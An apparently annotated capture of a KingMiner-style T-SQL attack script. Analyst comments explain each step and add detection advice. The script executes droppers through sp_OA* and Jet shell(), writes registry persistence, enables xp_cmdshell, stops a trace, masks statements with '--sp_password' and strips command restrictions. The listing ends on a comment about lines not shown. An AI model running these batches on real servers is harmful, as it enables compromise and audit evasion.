
kingminer-otx

a guest Apr 27th, 2018 246 Never
  1. Installation:
  -- Analyst note: this listing is a captured T-SQL attack script, kept verbatim as evidence.
  -- Every batch here needs a login allowed to call the sp_OA* procedures; how that login
  -- was obtained is not shown in this paste.
  2. use master  
  3. go
  -- Batch 1: OLE Automation instantiates 'ScriptControl' and evaluates JScript that
  --   (a) issues an HTTP GET via Microsoft.XMLHTTP (the URL argument is empty in this paste),
  --   (b) writes the response body to C:\Windows\temp\esentur.exe via ADODB.Stream, and
  --   (c) starts that file via WScript.Shell.
  -- Detection: the SQL Server service process writing an .exe under C:\Windows\temp, making
  -- outbound HTTP requests, or spawning child processes. Mitigation: keep
  -- 'Ole Automation Procedures' disabled and run the service under a low-privilege account.
  4. DECLARE @js int
  5. EXEC sp_OACreate 'ScriptControl',@js OUT
  6. EXEC sp_OASetProperty @js, 'Language', 'JavaScript1.1'
  7. EXEC sp_OAMethod @js, 'Eval', NULL, 'var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\Windows\temp\esentur.exe",2);var r = new ActiveXObject("WScript.Shell");r.Run("C:\Windows\temp\esentur.exe");'
  8.  
  9. go
  -- Batch 2: second attempt to start the dropped file, this time by creating wscript.shell
  -- directly (bracketed identifiers are used in place of quoted strings).
  10. DECLARE @sq int EXEC sp_oacreate [wscript.shell], @sq out;
  11. EXEC sp_oamethod @sq,[run], NULL, [C:\Windows\temp\esentur.exe]
  12.  
  13. go
  -- Batch 3: third attempt, creating the object by CLSID instead of ProgID. A later line of
  -- this listing registers this CLSID's InProcServer32 as wshom.ocx, so it appears to be the
  -- WScript.Shell class; using the CLSID would sidestep a removed or renamed ProgID.
  14. declare @cmd2w INT;exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@cmd2w output;
  15. exec sp_oamethod @cmd2w,'run',null,'C:\Windows\temp\esentur.exe','0'
  16.  
  17.  
  18. go
  -- Execution path that does not depend on WScript.Shell: the Jet OLE DB provider.
  -- Step 1 writes the Jet 4.0 'SandBoxMode' value. NOTE(review): value 1 is understood to
  -- leave the expression sandbox off for non-Access hosts such as an OLE DB consumer - confirm
  -- against Microsoft's SandBoxMode documentation.
  -- Detection: any write to HKLM\SOFTWARE\Microsoft\Jet\4.0\Engines\SandBoxMode from SQL Server.
  19. Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
  20.  
  21. go
  -- Step 2: OPENROWSET opens an existing .mdb through the Jet provider and runs a pass-through
  -- query whose only expression is shell("..."), which starts the dropped executable.
  -- OPENROWSET with an ad hoc provider string needs 'Ad Hoc Distributed Queries' enabled.
  -- Detection: query text combining openrowset, microsoft.jet.oledb.4.0 and shell(.
  22. select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("C:\Windows\temp\esentur.exe")')
  23.  
  24. go
  -- Same call against a second database file name in the same directory.
  25. Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\dnary.mdb','select shell("C:\Windows\temp\esentur.exe")')
  26.  
  27. go
  -- Fallback when no usable .mdb is present: ADOX.Catalog 'Create' is called with a Jet
  -- connection string, which creates a new Jet database file named SysS.xml (relative path,
  -- so it lands in the process's current directory). The .xml extension is only a file name.
  28. declare @hr int
  29. declare @object int;declare @property int
  30. exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT
  31. exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysS.xml'
  32.  
  33. go
  -- The shell() query is then repeated against the file created above.
  34. select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("C:\Windows\temp\esentur.exe")')
  35.  
  36. go
  -- Same create-then-query pair using an absolute path under the NetMeeting program folder.
  -- File indicators from this section: SysS.xml, c:\Progra~1\NetMeeting\uticl.xml.
  37. declare @hr int;declare @object int;declare @property int;exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT;
  38. exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=c:\Progra~1\NetMeeting\uticl.xml'
  39.  
  40. go
  41. select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\Progra~1\NetMeeting\uticl.xml','select shell("C:\Windows\temp\esentur.exe")')
  42.  
  43. go
  -- Persistence: xp_regwrite plants the dropped executable in three HKLM locations.
  -- (1) The machine-wide Run key, value name 'shell' - started at user logon.
  -- Detection: registry-write telemetry on ...\CurrentVersion\Run where the writing process
  -- is the SQL Server service; the value name 'shell' and the temp path are indicators.
  44. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','shell','REG_SZ','C:\Windows\temp\esentur.exe'
  45.  
  46. go
  -- (2) Command Processor 'AutoRun' - executed each time cmd.exe starts.
  47. exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Command Processor','AutoRun','REG_sz','C:\Windows\temp\esentur.exe'
  48.  
  49. go
  -- (3) A 'shell' value directly under SOFTWARE\Microsoft\Windows.
  -- NOTE(review): this is not a location known to be auto-started; treat it as an indicator
  -- only and confirm whether anything reads it.
  50. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows','shell','REG_SZ','C:\Windows\temp\esentur.exe'
  51.  
  52. go
  -- Script-file variant of the dropper: ADODB.Stream (Type 1 = binary) writes bytes supplied
  -- inline in the statement to C:\Windows\temp\esentur.vbs, so no network fetch is needed.
  -- NOTE(review): '0x16jinzhi' is not a valid binary literal; it looks like a template
  -- placeholder where the hex-encoded payload would be substituted - confirm against a
  -- live capture. As published, this statement would not parse.
  53. DECLARE @ObjectToken INT
  54. EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
  55. EXEC sp_OASetProperty @ObjectToken, 'Type', 1
  56. EXEC sp_OAMethod @ObjectToken, 'Open'
  57. EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x16jinzhi
  58. EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'C:\Windows\temp\esentur.vbs', 2
  59. EXEC sp_OAMethod @ObjectToken, 'Close'
  60. EXEC sp_OADestroy @ObjectToken
  61. go
  -- The written .vbs is started through wscript.shell ...
  62. DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\Windows\temp\esentur.vbs'
  63. go
  64.  
  -- ... and, as a fallback, through the Jet shell() expression against ias.mdb.
  65. select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("C:\Windows\temp\esentur.vbs")')
  66.  
  67. go
  68.  
  -- Second fallback: create a Jet database file named SysS.xml, then run shell() against it.
  -- Detection: a script host or any other child process whose parent is the SQL Server service.
  69. declare @hr int
  70. declare @object int;declare @property int
  71. exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT
  72. exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysS.xml'
  73. go
  74.  
  75. select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("C:\Windows\temp\esentur.vbs")')
  76.  
  77.  
  78. Post Install:
  -- "Post Install" section, part 1: re-enabling server options that a hardened instance
  -- keeps off. The same settings are issued many times in slightly different spellings
  -- (with/without EXEC, N'' literals, WITH OVERRIDE, one-line and multi-line forms),
  -- presumably so that at least one form succeeds across server versions - not verified here.
  -- Options switched on in this block:
  --   'allow updates'               - direct system-table updates on old versions
  --   'show advanced options'       - prerequisite for changing the options below
  --   'xp_cmdshell'                 - OS command execution from T-SQL
  --   'Ad Hoc Distributed Queries'  - needed by the OPENROWSET calls in this listing
  --   'Ole Automation Procedures'   - needed by the sp_OA* calls in this listing
  -- Changing these requires server-level ALTER SETTINGS permission, so the script assumes a
  -- highly privileged login.
  -- Detection: SQL Server records configuration option changes in its error log; alert on any
  -- of the last three options changing from 0 to 1. Mitigation: strong credentials and no
  -- internet-exposed listener for privileged logins; audit sp_configure/RECONFIGURE use.
  79. SET ANSI_NULLS ON              
  80. SET ANSI_WARNINGS ON
  81. go
  82. sp_configure 'allow updates', 1
  83. go
  84. RECONFIGURE WITH OVERRIDE
  85. go
  86. EXEC sp_configure 'show advanced options', 1
  87. go
  88. RECONFIGURE
  89. go
  90. RECONFIGURE WITH OVERRIDE
  91. go
  92. EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure
  93. 'xp_cmdshell', 1;RECONFIGURE;
  94. go
  95. sp_configure 'show advanced options',1
  96. go
  97. RECONFIGURE WITH OVERRIDE
  98. go
  99. reconfigure
  100. go
  101. RECONFIGURE WITH OVERRIDE
  102.  
  103. go
  104. sp_configure 'xp_cmdshell',1
  105. go
  106. RECONFIGURE WITH OVERRIDE
  107. go
  108. reconfigure
  109. go
  110. RECONFIGURE WITH OVERRIDE
  111. go
  112. exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
  113. 'Ad Hoc Distributed Queries',1;RECONFIGURE;
  114. go
  115.  
  116. exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
  117. 'Ole Automation Procedures',1;RECONFIGURE;
  118. go
  119. sp_configure 'show advanced options', 1;
  120. go
  121. RECONFIGURE;
  122. go
  123.  
  124. RECONFIGURE WITH OVERRIDE
  125. go
  126. sp_configure 'Ole Automation Procedures', 1;
  127. go
  128. RECONFIGURE;
  129. go
  130. RECONFIGURE WITH OVERRIDE
  131. go
  -- This variant turns 'show advanced options' back off after enabling xp_cmdshell, so a
  -- casual look at that one option would not reveal the change.
  132. EXEC sp_configure N'show advanced options', N'1'
  133. RECONFIGURE WITH OVERRIDE
  134. EXEC sp_configure N'xp_cmdshell', N'1'
  135. RECONFIGURE WITH OVERRIDE
  136. EXEC sp_configure N'show advanced options', N'0'
  137. RECONFIGURE WITH OVERRIDE
  138. go
  139. EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE WITH OVERRIDE;--
  140. go
  141. EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
  142. go
  143.  
  144.  
  -- Part 2: the helper procedures used to register and unregister extended stored procedures
  -- are dropped and then recreated from inline source. Both recreated bodies are thin wrappers
  -- over DBCC addextendedproc / DBCC dropextendedproc that refuse to run inside an open
  -- transaction (error 15002). Recreating them gives the script a known-good way to map
  -- procedure names to DLLs even where an administrator removed or altered the originals.
  -- Detection: DROP/CREATE PROCEDURE on sp_addextendedproc or sp_dropextendedproc in master,
  -- and any DBCC addextendedproc / dropextendedproc activity outside a change window.
  145. DROP PROCEDURE sp_addextendedproc;DROP PROCEDURE sp_dropextendedproc
  146. go
  147. create procedure sp_addextendedproc --- 1996/08/30 20:13
  148. @functname nvarchar(517),/* (owner.)name of function to call */
  149. @dllname varchar(255)/* name of DLL containing function */
  150. as
  151. set implicit_transactions off
  152. if @@trancount > 0
  153. begin
  154. raiserror(15002,-1,-1,'sp_addextendedproc')
  155. return (1)
  156. end
  157. dbcc addextendedproc( @functname, @dllname)
  158. return (0) -- sp_addextendedproc
  159. GO
  160.  
  161. go
  162. create procedure dbo.sp_dropextendedproc
  163. @functname nvarchar(517) -- name of function
  164. as
  165. -- If we're in a transaction, disallow the dropping of the
  166. -- extended stored procedure.
  167. set implicit_transactions off
  168. if @@trancount > 0
  169. begin
  170. raiserror(15002,-1,-1,'sys.sp_dropextendedproc')
  171. return (1)
  172. end
  173.  
  174. -- Drop the extended procedure mapping.
  175. dbcc dropextendedproc( @functname )
  176. return (0) -- sp_dropextendedproc
  177. go
  -- Removes the existing xp_cmdshell mapping; a later batch in this listing adds it back
  -- pointing at xplog70.dll.
  178. dbcc dropextendedproc ("xp_cmdshell")
  179. go
  -- Part 3: drop-then-re-register cycle for the extended procedures the attack relies on.
  -- The DROP statements remove whatever is currently registered under these names; the
  -- sp_addextendedproc / DBCC addextendedproc calls further down map the names to the
  -- DLLs named in each call (xpstar.dll, xplog70.dll, odsole70.dll). Presumably this undoes
  -- hardening in which an administrator unregistered or replaced these procedures - the
  -- paste itself does not state the intent.
  -- Detection: bulk DROP PROCEDURE on xp_*/sp_OA* names followed by re-registration.
  180. drop PROCEDURE sp_OACreate
  181. drop PROCEDURE xp_cmdshell
  182. drop PROCEDURE xp_dirtree
  183. drop PROCEDURE sp_oamethod
  184. drop PROCEDURE xp_regaddmultistring
  185. drop PROCEDURE xp_regdeletekey
  186. drop PROCEDURE xp_regdeletevalue
  187. drop PROCEDURE xp_regenumvalues
  188. drop PROCEDURE xp_regread
  189. drop PROCEDURE xp_regwrite
  190. drop PROCEDURE xp_makewebtask
  191.  
  192.  
  193. go
  -- Configuration options are enabled again (repeats of the earlier sp_configure batches).
  194. EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
  195. go
  196. USE master;
  197. EXEC sp_configure 'show advanced options', 1;
  198. RECONFIGURE WITH OVERRIDE;
  199. EXEC sp_configure 'Ole Automation Procedures', 1;
  200. RECONFIGURE WITH OVERRIDE;
  201. EXEC sp_configure 'show advanced options', 0;
  202. go
  203. EXEC sp_configure 'show advanced options', 1;
  204. RECONFIGURE;
  205. go
  206. EXEC sp_configure 'Ole Automation Procedures', 1;
  207. RECONFIGURE;
  208. go
  -- Re-registration: file-system/enumeration helpers, the full sp_OA* family, and the
  -- registry read/write/delete procedures.
  209. use master        
  210. exec sp_addextendedproc xp_dirtree,'xpstar.dll'    
  211. exec sp_addextendedproc xp_enumgroups,'xplog70.dll'    
  212. exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'    
  213. exec sp_addextendedproc xp_loginconfig,'xplog70.dll'    
  214. exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'    
  215. exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'    
  216. exec sp_addextendedproc sp_OACreate,'odsole70.dll'    
  217. exec sp_addextendedproc sp_OADestroy,'odsole70.dll'    
  218. exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'    
  219. exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'    
  220. exec sp_addextendedproc sp_OAMethod,'odsole70.dll'    
  221. exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'    
  222. exec sp_addextendedproc sp_OAStop,'odsole70.dll'    
  223. exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'    
  224. exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'    
  225. exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'    
  226. exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'    
  227. exec sp_addextendedproc xp_regread,'xpstar.dll'    
  228. exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'    
  229. exec sp_addextendedproc xp_regwrite,'xpstar.dll'    
  230. exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
  231. go
  -- xp_cmdshell is mapped back via DBCC directly rather than through the wrapper procedure.
  232. exec sp_addextendedproc sp_OAMethod,'odsole70.dll'  
  233. dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
  234. go
  -- One more drop/re-add pass limited to the four sp_OA* procedures used by the dropper.
  235. DROP PROCEDURE sp_OAMethod;DROP PROCEDURE sp_OACreate;DROP PROCEDURE sp_OASetProperty;DROP PROCEDURE sp_OADestroy
  236. go
  237. exec sp_addextendedproc sp_OAMethod,'odsole70.dll';exec sp_addextendedproc sp_OACreate,'odsole70.dll';exec sp_addextendedproc sp_OASetProperty,'odsole70.dll';exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
  238. go
  -- Audit tampering: on anything other than SQL Server 2000 this calls
  -- sp_trace_setstatus with trace id 5 and status 0, which stops that trace. On SQL Server
  -- 2000 the branch only switches database context. Which trace holds id 5 depends on the
  -- target; the paste does not say what the author expected it to be.
  -- Detection: review sys.traces / trace status for traces stopped unexpectedly, and ship
  -- audit data off-host so that stopping a local trace does not erase visibility.
  239. if(@@version like 'Microsoft SQL Server  2000%')
  240. use master;
  241. else
  242. exec sp_trace_setstatus 5, 0;
  243. go
  -- Conditional drops of procedures found in dbo.sysobjects, including sp_trace_setstatus
  -- itself and the helper sp_addextendedproc.
  244. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_trace_setstatus]'))drop procedure sp_trace_setstatus
  245. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_regwrite]'))drop procedure xp_regwrite
  246. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_addextendedproc]'))drop procedure sp_addextendedproc
  247. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))drop procedure sp_oacreate
  248. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))drop procedure sp_OASetProperty
  249. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))drop procedure sp_OADestroy
  250. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))drop procedure sp_OAMethod;
  251. go
  -- One-line re-creation of the sp_addextendedproc wrapper (same body as the multi-line
  -- version earlier in this listing).
  252. create procedure sp_addextendedproc @functname nvarchar(517),@dllname varchar(255) as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0);
  253. go
  -- Re-adds each procedure only when it is missing. NOTE(review): 'sp_trace_setstatus' is
  -- mapped here to odsole70.dll, the same DLL used for the sp_OA* procedures - whether that
  -- mapping yields a working trace procedure is doubtful; confirm on a test instance.
  254. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_trace_setstatus]'))dbcc addextendedproc ('sp_trace_setstatus','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_regwrite]'))dbcc addextendedproc ('xp_regwrite','xpstar.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll')
  255. go
  -- Part 4: the configuration changes are repeated, now with a trailing '--sp_password'
  -- comment on most batches. NOTE(review): this matches the known behaviour where SQL Server
  -- trace/profiler output replaces the text of any statement containing the string
  -- 'sp_password', so the marker appears to be a log-evasion measure - confirm for the server
  -- version in question.
  -- Detection: masked trace events that do not coincide with a legitimate password change,
  -- and the literal '--sp_password' in captured network or client-side query logs.
  -- First batch: starts the SQL Server Agent service through xp_servicecontrol.
  256. EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';
  257. --sp_password
  258. GO
  259. EXEC sp_configure 'allow updates',1;
  260. RECONFIGURE WITH OVERRIDE;
  261. --sp_password
  262. GO
  263. EXEC sp_configure 'show advanced options', 1;
  264. RECONFIGURE WITH OVERRIDE;
  265. --sp_password
  266. GO
  267. EXEC sp_configure 'xp_cmdshell', 1;
  268. RECONFIGURE WITH OVERRIDE;
  269. --sp_password
  270. GO
  271. EXEC sp_configure 'Ad Hoc Distributed Queries',1;
  272. RECONFIGURE WITH override;
  273. --sp_password
  274. GO
  275. EXEC sp_configure 'Ole Automation Procedures',1;
  276. RECONFIGURE WITH override;
  277. --sp_password
  278. GO
  279. EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
  280. GO
  281. EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
  282. GO
  283. EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
  284. --sp_password
  285. GO
  -- Part 5: registry clean-up that removes settings able to block or redirect the system
  -- tools used elsewhere in this listing:
  --   * the 'DisableCMD' policy value (per-user command-prompt restriction),
  --   * Command Processor 'AutoRun' values in HKLM and HKCU,
  --   * 'App Paths' entries for cmd/regini/regsvr32/wscript/cscript/secedit,
  --   * 'Image File Execution Options' keys for the same tools (the second batch).
  -- Presumably this clears restrictions placed by an administrator or by competing malware;
  -- the paste does not state which. Note that the HKLM AutoRun value deleted here is the same
  -- value the "Installation" section writes; the order in which the two sections are run is
  -- not shown.
  -- Detection: deletion of these keys/values by the SQL Server service account.
  286. exec xp_regdeletevalue 'HKEY_CURRENT_USER','Software\Policies\Microsoft\Windows\System','DisableCMD';
  287. exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Command Processor','AutoRun';
  288. exec xp_regdeletevalue 'HKEY_CURRENT_USER','SOFTWARE\Microsoft\Command Processor','AutoRun';
  289. exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmd.exe';
  290. exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\regini.exe';
  291. exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\regsvr32.exe';
  292. exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\wscript.exe';
  293. exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cscript.exe';
  294. exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\secedit.exe';
  295. --sp_password
  296. GO
  297. exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe';
  298. exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\secedit.exe';
  299. exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe';
  300. exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\script.exe';
  301. exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe';
  302. exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regsvr32.exe';
  303. --sp_password
  304. GO
  -- Part 6: preparing the COM/Jet components the dropper needs.
  -- A Jet database file named svch0st.xml (relative path) is created through ADOX.Catalog;
  -- later batches in this listing use it as the OPENROWSET database. The file name is an
  -- indicator.
  305. declare @hr int declare @object int declare @property int exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=svch0st.xml'
  306. --sp_password
  307. go
  -- Jet SandBoxMode is written as 0 here; further down the same value is written as 1.
  -- Either write, made by the database service, is worth alerting on.
  308. declare @a varchar(8000);exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
  309. --sp_password
  310. go
  -- The xp_regwrite calls below rewrite HKEY_CLASSES_ROOT registration data (ProgID -> CLSID,
  -- InprocServer32 path, TypeLib, version strings) for the COM classes used in this listing:
  -- WbemScripting.SWbemLocator, Microsoft.Jet.OLEDB.4.0, ADODB (msado15.dll), the wshom.ocx
  -- shell class, Scripting.FileSystemObject and Microsoft.XMLHTTP. Presumably this restores
  -- classes that an administrator unregistered as a hardening step - intent is inferred.
  -- Detection: HKCR\CLSID writes originating from the SQL Server service process.
  311. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'WbemScripting.SWbemLocator.1\CLSID', N'', REG_SZ, N'{76A64158-CB41-11D1-8B02-00600806D9B6}';
  312. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InprocServer32', N'', REG_SZ, N'C:\WINDOWS\system32\wbem\wbemdisp.dll';
  313. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\TypeLib', N'', REG_SZ, N'{565783C6-CB41-11D1-8B02-00600806D9B6}';
  314. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\ProgID', N'', REG_SZ, N'WbemScripting.SWbemLocator.1';
  315. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\Version', N'', REG_SZ, N'1.0';
  316. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\Programmable', N'', REG_SZ, N'';
  317. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\VersionIndependentProgID', N'', REG_SZ, N'WbemScripting.SWbemLocator';
  318. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'Microsoft.Jet.OLEDB.4.0\CLSID', N'', REG_SZ, N'{dee35070-506b-11cf-b1aa-00aa00b8de95}';
  319. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\ExtendedErrors\{dee35071-506b-11cf-b1aa-00aa00b8de95}', N'', REG_SZ, N'Microsoft Jet 4.0 OLE DB ProviderError Lookup';
  320. go
  321. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\InprocServer32', N'', REG_SZ, N'C:\WINDOWS\system32\msjetoledb40.dll';
  322. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\OLE DB Provider', N'', REG_SZ, N'Microsoft Jet 4.0 OLE DB Provider';
  -- NOTE(review): the type argument on the next line reads 'EG_SZ', not 'REG_SZ' as on every
  -- sibling line; this looks like a typo in the script, so this one write probably fails.
  -- The same key is written again, with REG_SZ, further down.
  323. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\ProgID', N'', EG_SZ, N'Microsoft.Jet.OLEDB.4.0';
  324. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\VersionIndependentProgID', N'', REG_SZ, N'Microsoft.Jet.OLEDB';
  325. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\ProgID', N'', REG_SZ, N'ADODB.Record.2.8';
  326. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32', N'', REG_SZ, N'C:\Progra~1\Common~1\System\ado\msado15.dll';
  327. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\VersionIndependentProgID', N'', REG_SZ, N'ADODB.Record';
  328. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32', N'', REG_SZ, N'C:\WINDOWS\system32\wshom.ocx';
  329. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'ADODB.Stream\CLSID', N'', REG_SZ, N'{00000566-0000-0010-8000-00AA006D2EA4}';
  330. exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
  331. go
  332. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0\win32', N'', REG_SZ, N'C:\WINDOWS\system32\wshom.ocx';
  333. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\FLAGS', N'', REG_SZ, N'0';
  -- The next line and the last line of this batch each carry an embedded
  -- 'DROP PROCEDURE sp_password' statement after the registry write (a backslash does not
  -- escape the closing quote in T-SQL, so the string ends at system32\'). Besides attempting
  -- the drop, the statement text contains the string 'sp_password' - see the trace-masking
  -- note on the '--sp_password' markers; which effect was intended is not stated.
